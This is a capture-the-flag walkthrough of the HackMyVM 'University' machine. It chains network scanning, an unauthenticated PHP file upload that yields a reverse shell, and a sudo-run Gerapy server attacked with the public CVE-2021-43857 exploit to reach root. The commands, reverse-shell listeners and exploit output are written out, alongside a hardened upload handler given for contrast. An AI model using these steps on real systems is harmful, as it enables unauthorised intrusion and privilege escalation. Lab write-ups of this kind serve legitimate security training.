Writeup of University from HackMyVM – Walkthrough
University is an easy machine from the HackMyVM platform, created by SML. Its main exploit is an insecure file upload that leads to remote code execution, and the machine is fairly easy overall.
Step 1: ARP Scan
As usual, my enumeration began with the arp-scan on the network to identify the IP address of the target.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.129
Here, 10.0.0.4 is my IP address whereas 10.0.0.129 is that of the target.
Step 2: Nmap scan
Next comes the nmap port scan, which identifies the services we need to enumerate.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-20 20:39 +0545
Nmap scan report for 10.0.0.129
Host is up (0.0021s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:ee:da:29:f1:ae:03:a5:c3:7e:45:84:c7:86:67:ce (RSA)
| 256 f8:1c:ef:96:7b:ae:74:21:6c:9f:06:9b:20:0a:d8:56 (ECDSA)
|_ 256 19:fc:94:32:41:9d:43:6f:52:c5:ba:5a:f0:83:b4:5b (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-git:
| 10.0.0.129:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/rskoolrash/Online-Admission-System
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The Nmap http-git script found an exposed .git directory whose remote points to the GitHub repository above, which makes further enumeration much easier: clone the repository and read the source. I suggest a code editor like VSCode for analysing a repo. With the source available, you certainly don't need a gobuster scan, so I won't run one here.
Step 3: Insecure file upload
There is a file called adminsession.php that checks for the admin session.
<?php
extract($_POST);
if (!isset($_SESSION[ad]))
{
    echo "<br>You are not Logged In Please Login to Access this Page<br>";
    echo "<a href=adminlogin.php>Click Here to Login</a>";
    exit();
}
?>
This file checks whether the admin has logged in, but documents.php and fileupload.php never include it. documents.php includes fileupload.php, which shows where the uploaded files are stored. Furthermore, there is no check of file extensions at all, so we can upload PHP shells.
<?php
session_start();
$sp=mysqli_connect("localhost","root","","oas");
if($sp->connect_errno){
    echo "Error <br/>".$sp->error;
}
$picpath="studentpic/";
$docpath="studentdoc/";
$proofpath="studentproof/";
$id=$_SESSION['user'];
if(isset($_POST['fpicup']))
// snip
Thus, I uploaded a PHP shell through each of the file inputs on documents.php and reached it under the paths mentioned above. Finally, I got the shell.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ nc -nlvp 9001
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.0.0.129.
Ncat: Connection from 10.0.0.129:34860.
Linux university 5.10.0-10-amd64 #1 SMP Debian 5.10.84-1 (2021-12-08) x86_64 GNU/Linux
10:58:23 up 3:17, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Check this link for upgrading reverse shell
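For contrast, here is how the upload handler should look. This is an added example, not the Online-Admission-System project's code; it keeps the $_SESSION['user'] key and the fpicup input name from the snippet above, while the $_FILES key, the upload directory and the allowlist are assumptions.

```php
<?php
// Hardened upload handler (added example, not the project's own code).
// Keeps $_SESSION['user'] and the fpicup input name from the walkthrough;
// the $_FILES key, upload path and allowlist below are assumptions.
session_start();

// 1. Session guard on every page that handles uploads. The original
//    adminsession.php tested $_SESSION[ad] (a bare constant) and was
//    never included by documents.php or fileupload.php at all.
if (!isset($_SESSION['user'])) {
    http_response_code(403);
    exit('You are not logged in.');
}

// 2. Store uploads outside the web root so nginx/php-fpm never execute them.
const UPLOAD_DIR = '/var/www/uploads/studentpic/';  // assumed path
const MAX_BYTES  = 2 * 1024 * 1024;
const ALLOWED    = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'pdf' => 'application/pdf'];

function store_upload(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('rejected: upload error or size');
    }
    // 3. Extension allowlist on the client-supplied name...
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('rejected: extension not allowed');
    }
    // 4. ...and the MIME type sniffed from the bytes must agree with it.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        throw new RuntimeException('rejected: content does not match extension');
    }
    // 5. Server-chosen random name: the uploader never controls the stored path.
    $dest = UPLOAD_DIR . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('upload failed');
    }
    return $dest;
}

if (isset($_POST['fpicup'], $_FILES['fpic'])) {  // $_FILES key assumed
    try {
        $saved = store_upload($_FILES['fpic']);
        // record $saved against (int) $_SESSION['user'] with a prepared statement
    } catch (RuntimeException $e) {
        http_response_code(400);
        exit(htmlspecialchars($e->getMessage()));
    }
}
```

Each of the five numbered checks closes one gap the walkthrough exploits: missing authentication, an upload directory served by the web server, no extension check, no content check, and an attacker-controlled file name.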
Step 4: Switch to root
In the /var/www/html directory, there is a file containing the password of the user sandra. With this password, we can switch to the user sandra.
The user sandra can run gerapy with sudo permission. Gerapy is a framework written in Django. There is an exploit allowing remote command execution.
https://www.exploit-db.com/exploits/50640
However, the exploit needs a running Gerapy project, so I initialised one.
sandra@university:/tmp/exploit$ sudo gerapy init
Initialized workspace gerapy
sandra@university:/tmp/exploit$ cd gerapy/
sandra@university:/tmp/exploit/gerapy$ sudo gerapy migrate
Operations to perform:
Apply all migrations: admin, auth, authtoken, contenttypes, core, django_apscheduler, sessions
Running migrations:
Applying contenttypes.0001_initial... OK
Applying auth.0001_initial... OK
Applying admin.0001_initial... OK
Applying admin.0002_logentry_remove_auto_add... OK
Applying admin.0003_logentry_add_action_flag_choices... OK
Applying contenttypes.0002_remove_content_type_name... OK
Applying auth.0002_alter_permission_name_max_length... OK
Applying auth.0003_alter_user_email_max_length... OK
Applying auth.0004_alter_user_username_opts... OK
Applying auth.0005_alter_user_last_login_null... OK
Applying auth.0006_require_contenttypes_0002... OK
Applying auth.0007_alter_validators_add_error_messages... OK
Applying auth.0008_alter_user_username_max_length... OK
Applying auth.0009_alter_user_last_name_max_length... OK
Applying auth.0010_alter_group_name_max_length... OK
Applying auth.0011_update_proxy_permissions... OK
Applying authtoken.0001_initial... OK
Applying authtoken.0002_auto_20160226_1747... OK
Applying authtoken.0003_tokenproxy... OK
Applying core.0001_initial... OK
Applying core.0002_auto_20180119_1210... OK
Applying core.0003_auto_20180123_2304... OK
Applying core.0004_auto_20180124_0032... OK
Applying core.0005_auto_20180131_1210... OK
Applying core.0006_auto_20180131_1235... OK
Applying core.0007_task_trigger... OK
Applying core.0008_auto_20180703_2305... OK
Applying core.0009_auto_20180711_2332... OK
Applying core.0010_auto_20191027_2040... OK
Applying django_apscheduler.0001_initial... OK
Applying django_apscheduler.0002_auto_20180412_0758... OK
Applying django_apscheduler.0003_auto_20200716_1632... OK
Applying django_apscheduler.0004_auto_20200717_1043... OK
Applying django_apscheduler.0005_migrate_name_to_id... OK
Applying django_apscheduler.0006_remove_djangojob_name... OK
Applying django_apscheduler.0007_auto_20200717_1404... OK
Applying django_apscheduler.0008_remove_djangojobexecution_started... OK
Applying sessions.0001_initial... OK
Note that the workspace initialised here is itself named gerapy. We then run the server as root so that the remote command execution yields root privileges. Before that, I created a superuser.
sandra@university:/tmp/exploit/gerapy$ sudo gerapy createsuperuser
Username (leave blank to use 'root'): root
Email address:
Password:
Password (again):
The password is too similar to the username.
This password is too short. It must contain at least 8 characters.
This password is too common.
Bypass password validation and create user anyway? [y/N]: y
Superuser created successfully.
sandra@university:/tmp/exploit/gerapy$ sudo gerapy runserver 0.0.0.0:8000
Watching for file changes with StatReloader
Performing system checks...
System check identified no issues (0 silenced).
INFO - 2022-01-29 01:22:15,360 - process: 493 - scheduler.py - gerapy.server.core.scheduler - 102 - scheduler - successfully synced task with jobs with force
January 29, 2022 - 01:22:15
Django version 2.2.24, using settings 'gerapy.server.server.settings'
Starting development server at http://0.0.0.0:8000/
Quit the server with CONTROL-C.
This exposes the server on the network, so we can run the exploit from Exploit-DB against it.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ searchsploit -m 50640
Exploit: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
URL: https://www.exploit-db.com/exploits/50640
Path: /usr/share/exploitdb/exploits/python/remote/50640.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/hackmyvm/university/50640.py
Lastly, I updated the exploit with the credentials and ran it.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ python3 50640.py -t 10.0.0.129 -p 8000 -L 10.0.0.4 -P 9001
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
Traceback (most recent call last):
File "/home/kali/hackmyvm/university/50640.py", line 130, in <module>
exp.exploitation()
File "/home/kali/hackmyvm/university/50640.py", line 76, in exploitation
name = dict3[0]['name']
IndexError: list index out of range
The error shows that the exploit could not find any projects. So I added a project from the web app itself; after that, the exploit found the project, the error was gone, and I got the shell.
┌──(kali㉿kali)-[~/hackmyvm/university]
└─$ python3 50640.py -t 10.0.0.129 -p 8000 -L 10.0.0.4 -P 9001
______ _______ ____ ___ ____ _ _ _ _____ ___ ____ _____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | | || ||___ / ( _ ) ___|___ |
| | \ \ / /| _| _____ __) | | | |__) | |_____| || |_ |_ \ / _ \___ \ / /
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__ _|__) | (_) |__) |/ /
\____| \_/ |_____| |_____|\___/_____|_| |_||____/ \___/____//_/
Exploit for CVE-2021-43857
For: Gerapy < 0.9.8
[*] Resolving URL...
[*] Logging in to application...
[*] Login successful! Proceeding...
[*] Getting the project list
[*] Found project: project
[*] Getting the ID of the project to build the URL
[*] Found ID of the project: 1
[*] Setting up a netcat listener
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
[*] Executing reverse shell payload
[*] Watchout for shell! :)
Ncat: Connection from 10.0.0.129.
Ncat: Connection from 10.0.0.129:48416.
root@university:/tmp/exploit/gerapy#
Check my walkthrough of Connection from the HackMyVM platform.